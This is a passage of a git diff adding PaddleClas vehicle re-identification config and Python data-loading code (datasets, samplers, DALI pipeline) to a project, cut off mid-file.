"./dataset/VeRI-Wild/images/" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/train_list_start0.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 64 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id_query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + + Gallery: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/data/__init__.py b/Smart_container/PaddleClas/ppcls/data/__init__.py new file mode 100644 index 0000000..fd41ea3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/__init__.py @@ -0,0 +1,139 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import copy +import paddle +import numpy as np +from paddle.io import DistributedBatchSampler, BatchSampler, DataLoader +from ppcls.utils import logger + +from ppcls.data import dataloader +# dataset +from ppcls.data.dataloader.imagenet_dataset import ImageNetDataset +from ppcls.data.dataloader.multilabel_dataset import MultiLabelDataset +from ppcls.data.dataloader.common_dataset import create_operators +from ppcls.data.dataloader.vehicle_dataset import CompCars, VeriWild +from ppcls.data.dataloader.logo_dataset import LogoDataset +from ppcls.data.dataloader.icartoon_dataset import ICartoonDataset +from ppcls.data.dataloader.mix_dataset import MixDataset + +# sampler +from ppcls.data.dataloader.DistributedRandomIdentitySampler import DistributedRandomIdentitySampler +from ppcls.data.dataloader.pk_sampler import PKSampler +from ppcls.data.dataloader.mix_sampler import MixSampler +from ppcls.data import preprocess +from ppcls.data.preprocess import transform + + +def create_operators(params): + """ + create operators based on the config + + Args: + params(list): a dict list, used to create some operators + """ + assert isinstance(params, list), ('operator config should be a list') + ops = [] + for operator in params: + assert isinstance(operator, + dict) and len(operator) == 1, "yaml format error" + op_name = list(operator)[0] + param = {} if operator[op_name] is None else operator[op_name] + op = getattr(preprocess, op_name)(**param) + ops.append(op) + + return ops + + +def build_dataloader(config, mode, device, use_dali=False, seed=None): + assert mode in [ + 'Train', 'Eval', 'Test', 'Gallery', 'Query' + ], "Dataset mode should be Train, Eval, Test, Gallery, Query" + # build dataset + if use_dali: + from ppcls.data.dataloader.dali import dali_dataloader + return dali_dataloader(config, mode, paddle.device.get_device(), seed) + + config_dataset = config[mode]['dataset'] + config_dataset = copy.deepcopy(config_dataset) + dataset_name = config_dataset.pop('name') + if 'batch_transform_ops' in config_dataset: + batch_transform = config_dataset.pop('batch_transform_ops') + else: + batch_transform = None + + dataset = eval(dataset_name)(**config_dataset) + + logger.debug("build dataset({}) success...".format(dataset)) + + # build sampler + config_sampler = config[mode]['sampler'] + if "name" not in config_sampler: + batch_sampler = None + batch_size = config_sampler["batch_size"] + drop_last = config_sampler["drop_last"] + shuffle = config_sampler["shuffle"] + else: + sampler_name = config_sampler.pop("name") + batch_sampler = eval(sampler_name)(dataset, **config_sampler) + + logger.debug("build batch_sampler({}) success...".format(batch_sampler)) + + # build batch operator + def mix_collate_fn(batch): + batch = transform(batch, batch_ops) + # batch each field + slots = [] + for items in batch: + for i, item in enumerate(items): + if len(slots) < len(items): + slots.append([item]) + else: + slots[i].append(item) + return [np.stack(slot, axis=0) for slot in slots] + + if isinstance(batch_transform, list): + batch_ops = create_operators(batch_transform) + batch_collate_fn = mix_collate_fn + else: + batch_collate_fn = None + + # build dataloader + config_loader = config[mode]['loader'] + num_workers = config_loader["num_workers"] + use_shared_memory = config_loader["use_shared_memory"] + + if batch_sampler is None: + data_loader = DataLoader( + dataset=dataset, + places=device, + num_workers=num_workers, + return_list=True, + use_shared_memory=use_shared_memory, + batch_size=batch_size, + shuffle=shuffle, + drop_last=drop_last, + collate_fn=batch_collate_fn) + else: + data_loader = DataLoader( + dataset=dataset, + places=device, + num_workers=num_workers, + return_list=True, + use_shared_memory=use_shared_memory, + batch_sampler=batch_sampler, + collate_fn=batch_collate_fn) + + logger.debug("build data_loader({}) success...".format(data_loader)) + return data_loader diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/DistributedRandomIdentitySampler.py b/Smart_container/PaddleClas/ppcls/data/dataloader/DistributedRandomIdentitySampler.py new file mode 100644 index 0000000..1203803 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/DistributedRandomIdentitySampler.py @@ -0,0 +1,90 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from collections import defaultdict +import numpy as np +import copy +import random +from paddle.io import DistributedBatchSampler, Sampler + + +class DistributedRandomIdentitySampler(DistributedBatchSampler): + """ + Randomly sample N identities, then for each identity, + randomly sample K instances, therefore batch size is N*K. + Args: + - data_source (list): list of (img_path, pid, camid). + - num_instances (int): number of instances per identity in a batch. + - batch_size (int): number of examples in a batch. + """ + + def __init__(self, dataset, batch_size, num_instances, drop_last, **args): + self.dataset = dataset + self.batch_size = batch_size + self.num_instances = num_instances + self.drop_last = drop_last + self.num_pids_per_batch = self.batch_size // self.num_instances + self.index_dic = defaultdict(list) + for index, pid in enumerate(self.dataset.labels): + self.index_dic[pid].append(index) + self.pids = list(self.index_dic.keys()) + # estimate number of examples in an epoch + self.length = 0 + for pid in self.pids: + idxs = self.index_dic[pid] + num = len(idxs) + if num < self.num_instances: + num = self.num_instances + self.length += num - num % self.num_instances + + def __iter__(self): + batch_idxs_dict = defaultdict(list) + for pid in self.pids: + idxs = copy.deepcopy(self.index_dic[pid]) + if len(idxs) < self.num_instances: + idxs = np.random.choice( + idxs, size=self.num_instances, replace=True) + random.shuffle(idxs) + batch_idxs = [] + for idx in idxs: + batch_idxs.append(idx) + if len(batch_idxs) == self.num_instances: + batch_idxs_dict[pid].append(batch_idxs) + batch_idxs = [] + avai_pids = copy.deepcopy(self.pids) + final_idxs = [] + while len(avai_pids) >= self.num_pids_per_batch: + selected_pids = random.sample(avai_pids, self.num_pids_per_batch) + for pid in selected_pids: + batch_idxs = batch_idxs_dict[pid].pop(0) + final_idxs.extend(batch_idxs) + if len(batch_idxs_dict[pid]) == 0: + avai_pids.remove(pid) + _sample_iter = iter(final_idxs) + batch_indices = [] + for idx in _sample_iter: + batch_indices.append(idx) + if len(batch_indices) == self.batch_size: + yield batch_indices + batch_indices = [] + if not self.drop_last and len(batch_indices) > 0: + yield batch_indices + + def __len__(self): + if self.drop_last: + return self.length // self.batch_size + else: + return (self.length + self.batch_size - 1) // self.batch_size diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/__init__.py b/Smart_container/PaddleClas/ppcls/data/dataloader/__init__.py new file mode 100644 index 0000000..8f81921 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/__init__.py @@ -0,0 +1,9 @@ +from ppcls.data.dataloader.imagenet_dataset import ImageNetDataset +from ppcls.data.dataloader.multilabel_dataset import MultiLabelDataset +from ppcls.data.dataloader.common_dataset import create_operators +from ppcls.data.dataloader.vehicle_dataset import CompCars, VeriWild +from ppcls.data.dataloader.logo_dataset import LogoDataset +from ppcls.data.dataloader.icartoon_dataset import ICartoonDataset +from ppcls.data.dataloader.mix_dataset import MixDataset +from ppcls.data.dataloader.mix_sampler import MixSampler +from ppcls.data.dataloader.pk_sampler import PKSampler diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/common_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/common_dataset.py new file mode 100644 index 0000000..b7b03d8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/common_dataset.py @@ -0,0 +1,84 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np + +from paddle.io import Dataset +import cv2 + +from ppcls.data import preprocess +from ppcls.data.preprocess import transform +from ppcls.utils import logger + + +def create_operators(params): + """ + create operators based on the config + Args: + params(list): a dict list, used to create some operators + """ + assert isinstance(params, list), ('operator config should be a list') + ops = [] + for operator in params: + assert isinstance(operator, + dict) and len(operator) == 1, "yaml format error" + op_name = list(operator)[0] + param = {} if operator[op_name] is None else operator[op_name] + op = getattr(preprocess, op_name)(**param) + ops.append(op) + + return ops + + +class CommonDataset(Dataset): + def __init__( + self, + image_root, + cls_label_path, + transform_ops=None, ): + self._img_root = image_root + self._cls_path = cls_label_path + if transform_ops: + self._transform_ops = create_operators(transform_ops) + + self.images = [] + self.labels = [] + self._load_anno() + + def _load_anno(self): + pass + + def __getitem__(self, idx): + try: + with open(self.images[idx], 'rb') as f: + img = f.read() + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + return (img, self.labels[idx]) + + except Exception as ex: + logger.error("Exception occured when parse line: {} with msg: {}". + format(self.images[idx], ex)) + rnd_idx = np.random.randint(self.__len__()) + return self.__getitem__(rnd_idx) + + def __len__(self): + return len(self.images) + + @property + def class_num(self): + return len(set(self.labels)) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/dali.py b/Smart_container/PaddleClas/ppcls/data/dataloader/dali.py new file mode 100644 index 0000000..a15c231 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/dali.py @@ -0,0 +1,319 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import division + +import copy +import os + +import numpy as np +import nvidia.dali.ops as ops +import nvidia.dali.types as types +import paddle +from nvidia.dali import fn +from nvidia.dali.pipeline import Pipeline +from nvidia.dali.plugin.base_iterator import LastBatchPolicy +from nvidia.dali.plugin.paddle import DALIGenericIterator + + +class HybridTrainPipe(Pipeline): + def __init__(self, + file_root, + file_list, + batch_size, + resize_shorter, + crop, + min_area, + lower, + upper, + interp, + mean, + std, + device_id, + shard_id=0, + num_shards=1, + random_shuffle=True, + num_threads=4, + seed=42, + pad_output=False, + output_dtype=types.FLOAT, + dataset='Train'): + super(HybridTrainPipe, self).__init__( + batch_size, num_threads, device_id, seed=seed) + self.input = ops.readers.File( + file_root=file_root, + file_list=file_list, + shard_id=shard_id, + num_shards=num_shards, + random_shuffle=random_shuffle) + # set internal nvJPEG buffers size to handle full-sized ImageNet images + # without additional reallocations + device_memory_padding = 211025920 + host_memory_padding = 140544512 + self.decode = ops.decoders.ImageRandomCrop( + device='mixed', + output_type=types.DALIImageType.RGB, + device_memory_padding=device_memory_padding, + host_memory_padding=host_memory_padding, + random_aspect_ratio=[lower, upper], + random_area=[min_area, 1.0], + num_attempts=100) + self.res = ops.Resize( + device='gpu', resize_x=crop, resize_y=crop, interp_type=interp) + self.cmnp = ops.CropMirrorNormalize( + device="gpu", + dtype=output_dtype, + output_layout='CHW', + crop=(crop, crop), + mean=mean, + std=std, + pad_output=pad_output) + self.coin = ops.random.CoinFlip(probability=0.5) + self.to_int64 = ops.Cast(dtype=types.DALIDataType.INT64, device="gpu") + + def define_graph(self): + rng = self.coin() + jpegs, labels = self.input(name="Reader") + images = self.decode(jpegs) + images = self.res(images) + output = self.cmnp(images.gpu(), mirror=rng) + return [output, self.to_int64(labels.gpu())] + + def __len__(self): + return self.epoch_size("Reader") + + +class HybridValPipe(Pipeline): + def __init__(self, + file_root, + file_list, + batch_size, + resize_shorter, + crop, + interp, + mean, + std, + device_id, + shard_id=0, + num_shards=1, + random_shuffle=False, + num_threads=4, + seed=42, + pad_output=False, + output_dtype=types.FLOAT): + super(HybridValPipe, self).__init__( + batch_size, num_threads, device_id, seed=seed) + self.input = ops.readers.File( + file_root=file_root, + file_list=file_list, + shard_id=shard_id, + num_shards=num_shards, + random_shuffle=random_shuffle) + self.decode = ops.decoders.Image(device="mixed") + self.res = ops.Resize( + device="gpu", resize_shorter=resize_shorter, interp_type=interp) + self.cmnp = ops.CropMirrorNormalize( + device="gpu", + dtype=output_dtype, + output_layout='CHW', + crop=(crop, crop), + mean=mean, + std=std, + pad_output=pad_output) + self.to_int64 = ops.Cast(dtype=types.DALIDataType.INT64, device="gpu") + + def define_graph(self): + jpegs, labels = self.input(name="Reader") + images = self.decode(jpegs) + images = self.res(images) + output = self.cmnp(images) + return [output, self.to_int64(labels.gpu())] + + def __len__(self): + return self.epoch_size("Reader") + + +def dali_dataloader(config, mode, device, seed=None): + assert "gpu" in device, "gpu training is required for DALI" + device_id = int(device.split(':')[1]) + config_dataloader = config[mode] + seed = 42 if seed is None else seed + ops = [ + list(x.keys())[0] + for x in config_dataloader["dataset"]["transform_ops"] + ] + support_ops_train = [ + "DecodeImage", "NormalizeImage", "RandFlipImage", "RandCropImage" + ] + support_ops_eval = [ + "DecodeImage", "ResizeImage", "CropImage", "NormalizeImage" + ] + + if mode.lower() == 'train': + assert set(ops) == set( + support_ops_train + ), "The supported trasform_ops for train_dataset in dali is : {}".format( + ",".join(support_ops_train)) + else: + assert set(ops) == set( + support_ops_eval + ), "The supported trasform_ops for eval_dataset in dali is : {}".format( + ",".join(support_ops_eval)) + + normalize_ops = [ + op for op in config_dataloader["dataset"]["transform_ops"] + if "NormalizeImage" in op + ][0]["NormalizeImage"] + channel_num = normalize_ops.get("channel_num", 3) + output_dtype = types.FLOAT16 if normalize_ops.get("output_fp16", + False) else types.FLOAT + + env = os.environ + # assert float(env.get('FLAGS_fraction_of_gpu_memory_to_use', 0.92)) < 0.9, \ + # "Please leave enough GPU memory for DALI workspace, e.g., by setting" \ + # " `export FLAGS_fraction_of_gpu_memory_to_use=0.8`" + + gpu_num = paddle.distributed.get_world_size() + + batch_size = config_dataloader["sampler"]["batch_size"] + + file_root = config_dataloader["dataset"]["image_root"] + file_list = config_dataloader["dataset"]["cls_label_path"] + + interp = 1 # settings.interpolation or 1 # default to linear + interp_map = { + 0: types.DALIInterpType.INTERP_NN, # cv2.INTER_NEAREST + 1: types.DALIInterpType.INTERP_LINEAR, # cv2.INTER_LINEAR + 2: types.DALIInterpType.INTERP_CUBIC, # cv2.INTER_CUBIC + 3: types.DALIInterpType. + INTERP_LANCZOS3, # XXX use LANCZOS3 for cv2.INTER_LANCZOS4 + } + + assert interp in interp_map, "interpolation method not supported by DALI" + interp = interp_map[interp] + pad_output = channel_num == 4 + + transforms = { + k: v + for d in config_dataloader["dataset"]["transform_ops"] + for k, v in d.items() + } + + scale = transforms["NormalizeImage"].get("scale", 1.0 / 255) + scale = eval(scale) if isinstance(scale, str) else scale + mean = transforms["NormalizeImage"].get("mean", [0.485, 0.456, 0.406]) + std = transforms["NormalizeImage"].get("std", [0.229, 0.224, 0.225]) + mean = [v / scale for v in mean] + std = [v / scale for v in std] + + sampler_name = config_dataloader["sampler"].get("name", + "DistributedBatchSampler") + assert sampler_name in ["DistributedBatchSampler", "BatchSampler"] + + if mode.lower() == "train": + resize_shorter = 256 + crop = transforms["RandCropImage"]["size"] + scale = transforms["RandCropImage"].get("scale", [0.08, 1.]) + ratio = transforms["RandCropImage"].get("ratio", [3.0 / 4, 4.0 / 3]) + min_area = scale[0] + lower = ratio[0] + upper = ratio[1] + + if 'PADDLE_TRAINER_ID' in env and 'PADDLE_TRAINERS_NUM' in env: + shard_id = int(env['PADDLE_TRAINER_ID']) + num_shards = int(env['PADDLE_TRAINERS_NUM']) + device_id = int(env['FLAGS_selected_gpus']) + pipe = HybridTrainPipe( + file_root, + file_list, + batch_size, + resize_shorter, + crop, + min_area, + lower, + upper, + interp, + mean, + std, + device_id, + shard_id, + num_shards, + seed=seed + shard_id, + pad_output=pad_output, + output_dtype=output_dtype) + pipe.build() + pipelines = [pipe] + # sample_per_shard = len(pipe) // num_shards + else: + pipe = HybridTrainPipe( + file_root, + file_list, + batch_size, + resize_shorter, + crop, + min_area, + lower, + upper, + interp, + mean, + std, + device_id=device_id, + shard_id=0, + num_shards=1, + seed=seed, + pad_output=pad_output, + output_dtype=output_dtype) + pipe.build() + pipelines = [pipe] + # sample_per_shard = len(pipelines[0]) + return DALIGenericIterator( + pipelines, ['data', 'label'], reader_name='Reader') + else: + resize_shorter = transforms["ResizeImage"].get("resize_short", 256) + crop = transforms["CropImage"]["size"] + if 'PADDLE_TRAINER_ID' in env and 'PADDLE_TRAINERS_NUM' in env and sampler_name == "DistributedBatchSampler": + shard_id = int(env['PADDLE_TRAINER_ID']) + num_shards = int(env['PADDLE_TRAINERS_NUM']) + device_id = int(env['FLAGS_selected_gpus']) + + pipe = HybridValPipe( + file_root, + file_list, + batch_size, + resize_shorter, + crop, + interp, + mean, + std, + device_id=device_id, + shard_id=shard_id, + num_shards=num_shards, + pad_output=pad_output, + output_dtype=output_dtype) + else: + pipe = HybridValPipe( + file_root, + file_list, + batch_size, + resize_shorter, + crop, + interp, + mean, + std, + device_id=device_id, + pad_output=pad_output, + output_dtype=output_dtype) + pipe.build() + return DALIGenericIterator( + [pipe], ['data', 'label'], reader_name="Reader") diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/icartoon_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/icartoon_dataset.py new file mode 100644 index 0000000..2123414 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/icartoon_dataset.py @@ -0,0 +1,36 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import os + +from .common_dataset import CommonDataset + + +class ICartoonDataset(CommonDataset): + def _load_anno(self, seed=None): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split("\t") + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + assert os.path.exists(self.images[-1]) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/imagenet_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/imagenet_dataset.py new file mode 100644 index 0000000..e084bb7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/imagenet_dataset.py @@ -0,0 +1,38 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import os + +from .common_dataset import CommonDataset + + +class ImageNetDataset(CommonDataset): + def _load_anno(self, seed=None): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + + with open(self._cls_path) as fd: + lines = fd.readlines() + if seed is not None: + np.random.RandomState(seed).shuffle(lines) + for l in lines: + l = l.strip().split(" ") + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + assert os.path.exists(self.images[-1]) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/logo_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/logo_dataset.py new file mode 100644 index 0000000..3e05e7f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/logo_dataset.py @@ -0,0 +1,47 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import io +import tarfile +import numpy as np +from PIL import Image #all use default backend + +import paddle +from paddle.io import Dataset +import pickle +import os +import cv2 +import random + +from .common_dataset import CommonDataset + +class LogoDataset(CommonDataset): + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split("\t") + if l[0] == 'image_id': + continue + self.images.append(os.path.join(self._img_root, l[3])) + self.labels.append(int(l[1])-1) + assert os.path.exists(self.images[-1]) + + diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/mix_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_dataset.py new file mode 100644 index 0000000..cbf4b40 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_dataset.py @@ -0,0 +1,49 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import os + +from paddle.io import Dataset +from .. import dataloader + + +class MixDataset(Dataset): + def __init__(self, datasets_config): + super().__init__() + self.dataset_list = [] + start_idx = 0 + end_idx = 0 + for config_i in datasets_config: + dataset_name = config_i.pop('name') + dataset = getattr(dataloader, dataset_name)(**config_i) + end_idx += len(dataset) + self.dataset_list.append([end_idx, start_idx, dataset]) + start_idx = end_idx + + self.length = end_idx + + def __getitem__(self, idx): + for dataset_i in self.dataset_list: + if dataset_i[0] > idx: + dataset_i_idx = idx - dataset_i[1] + return dataset_i[2][dataset_i_idx] + + def __len__(self): + return self.length + + def get_dataset_list(self): + return self.dataset_list diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/mix_sampler.py b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_sampler.py new file mode 100644 index 0000000..2df3109 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_sampler.py @@ -0,0 +1,79 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division + +from paddle.io import DistributedBatchSampler, Sampler + +from ppcls.utils import logger +from ppcls.data.dataloader.mix_dataset import MixDataset +from ppcls.data import dataloader + + +class MixSampler(DistributedBatchSampler): + def __init__(self, dataset, batch_size, sample_configs, iter_per_epoch): + super().__init__(dataset, batch_size) + assert isinstance(dataset, + MixDataset), "MixSampler only support MixDataset" + self.sampler_list = [] + self.batch_size = batch_size + self.start_list = [] + self.length = iter_per_epoch + dataset_list = dataset.get_dataset_list() + batch_size_left = self.batch_size + self.iter_list = [] + for i, config_i in enumerate(sample_configs): + self.start_list.append(dataset_list[i][1]) + sample_method = config_i.pop("name") + ratio_i = config_i.pop("ratio") + if i < len(sample_configs) - 1: + batch_size_i = int(self.batch_size * ratio_i) + batch_size_left -= batch_size_i + else: + batch_size_i = batch_size_left + assert batch_size_i <= len(dataset_list[i][2]) + config_i["batch_size"] = batch_size_i + if sample_method == "DistributedBatchSampler": + sampler_i = DistributedBatchSampler(dataset_list[i][2], + **config_i) + else: + sampler_i = getattr(dataloader, sample_method)( + dataset_list[i][2], **config_i) + self.sampler_list.append(sampler_i) + self.iter_list.append(iter(sampler_i)) + self.length += len(dataset_list[i][2]) * ratio_i + self.iter_counter = 0 + + def __iter__(self): + while self.iter_counter < self.length: + batch = [] + for i, iter_i in enumerate(self.iter_list): + batch_i = next(iter_i, None) + if batch_i is None: + iter_i = iter(self.sampler_list[i]) + self.iter_list[i] = iter_i + batch_i = next(iter_i, None) + assert batch_i is not None, "dataset {} return None".format( + i) + batch += [idx + self.start_list[i] for idx in batch_i] + if len(batch) == self.batch_size: + self.iter_counter += 1 + yield batch + else: + logger.info("Some dataset reaches end") + self.iter_counter = 0 + + def __len__(self): + return self.length diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/multilabel_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/multilabel_dataset.py new file mode 100644 index 0000000..08d2ba1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/multilabel_dataset.py @@ -0,0 +1,59 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import os +import cv2 + +from ppcls.data.preprocess import transform +from ppcls.utils import logger + +from .common_dataset import CommonDataset + + +class MultiLabelDataset(CommonDataset): + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split("\t") + self.images.append(os.path.join(self._img_root, l[0])) + + labels = l[1].split(',') + labels = [int(i) for i in labels] + + self.labels.append(labels) + assert os.path.exists(self.images[-1]) + + def __getitem__(self, idx): + try: + with open(self.images[idx], 'rb') as f: + img = f.read() + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + label = np.array(self.labels[idx]).astype("float32") + return (img, label) + + except Exception as ex: + logger.error("Exception occured when parse line: {} with msg: {}". + format(self.images[idx], ex)) + rnd_idx = np.random.randint(self.__len__()) + return self.__getitem__(rnd_idx) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/pk_sampler.py b/Smart_container/PaddleClas/ppcls/data/dataloader/pk_sampler.py new file mode 100644 index 0000000..bf563a6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/pk_sampler.py @@ -0,0 +1,105 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# 